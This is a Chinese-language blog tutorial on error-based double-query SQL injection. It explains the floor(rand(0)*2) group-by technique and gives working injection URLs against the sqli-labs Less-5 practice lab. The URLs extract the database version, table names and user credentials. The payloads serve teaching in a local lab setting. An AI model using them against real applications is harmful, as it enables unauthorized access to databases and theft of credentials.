当前位置:网站首页>SQL注入(6)
SQL注入(6)
2022-08-02 03:25:00 【CHIAJ176】
GET报错注入
报错注入介绍
报错注入形式上是两个嵌套的查询,即select…(select…),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,然后再执行外面的select,双注入主要涉及到了几个sql函数:
rand()随机函数,返回0~1之间的某个值
floor(a)取整函数,返回小于等于a,且值最接近a的一个整数
count()聚合函数也称作计数函数,返回查询对象的总数
gourp by clause分组函数,按照查询结果分组
通过报错来显示具体的信息
查询的时候如果使用rand()的话,该值会被计算多次。在使用group
by的时候,floor(rand(0)*2)会被执行一次,如果虚表不存在记录,插入的时候会再被执行一次。在一次多记录的查询过程中floor(rand(0)*2)的只是定性的,为011011
python select count(*) from table group by floor(rand(0)*2);
GET单引号报错注入
Less 5:
获取数据库
http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
获取表名
http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
获取用户信息
http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
GET双引号报错注入
上面的单引号变成双引号,其它的没什么改变
Sqlmap安全测试
略!!!
边栏推荐
- (1)Thinkphp6入门、安装视图、模板渲染、变量赋值
- SQL classification, DQL (Data Query Language), and corresponding SQL query statement demonstration
- 利用cookie获取admin权限 CTF基础题
- Query the indexes of all tables in the database and parse them into sql
- [symfony/finder]最好用的文件操作库
- Warzone: 3 (Exogen) vulnhub walkthrough
- (2) Sequence structures, Boolean values of objects, selection structures, loop structures, lists, dictionaries, tuples, sets
- Alfa: 1 vulnhub walkthrough
- How to calculate the distance between two points on the earth (with formula derivation)
- 4.PHP数组与数组排序
猜你喜欢
CTF入门之php文件包含
Orasi: 1 vulnhub walkthrough
GreenOptic: 1 vulnhub walkthrough
IP access control: teach you how to implement an IP firewall with PHP
hackmyvm: juggling walkthrough
(4) Function, Bug, Class and Object, Encapsulation, Inheritance, Polymorphism, Copy
How to calculate the distance between two points on the earth (with formula derivation)
Offensive and defensive world - novice MISC area 1-12
[sebastian/diff] A historical change extension library for comparing two texts
CSRF(跨站请求伪造)
随机推荐
web渗透必玩的靶场——DVWA靶场 1(centos8.2+phpstudy安装环境)
3.PHP数据类型、常量、字符串和运算符
14. JS Statements and Comments, Variables and Data Types
Batch replace file fonts, Simplified -> Traditional
一次代码审计的笔记(CVE-2018-12613 phpmyadmin文件包含漏洞)
[sebastian/diff] A historical change extension library for comparing two texts
hackmyvm: juggling walkthrough
Pycharm打包项目为exe文件
2. PHP variables, output, EOF, conditional statements
DVWA drone installation tutorial
kali安装IDEA
Eric靶机渗透测试通关全教程
hackmyvm-bunny预排
PHP有哪些杀手级超厉害框架或库或应用?
Shuriken: 1 vulnhub walkthrough
CTF-网鼎杯往届题目
hackmyvm: again walkthrough
hackmyvm: juggling walkthrough
Orasi: 1 vulnhub walkthrough
战场:3(双子叶植物)vulnhub走读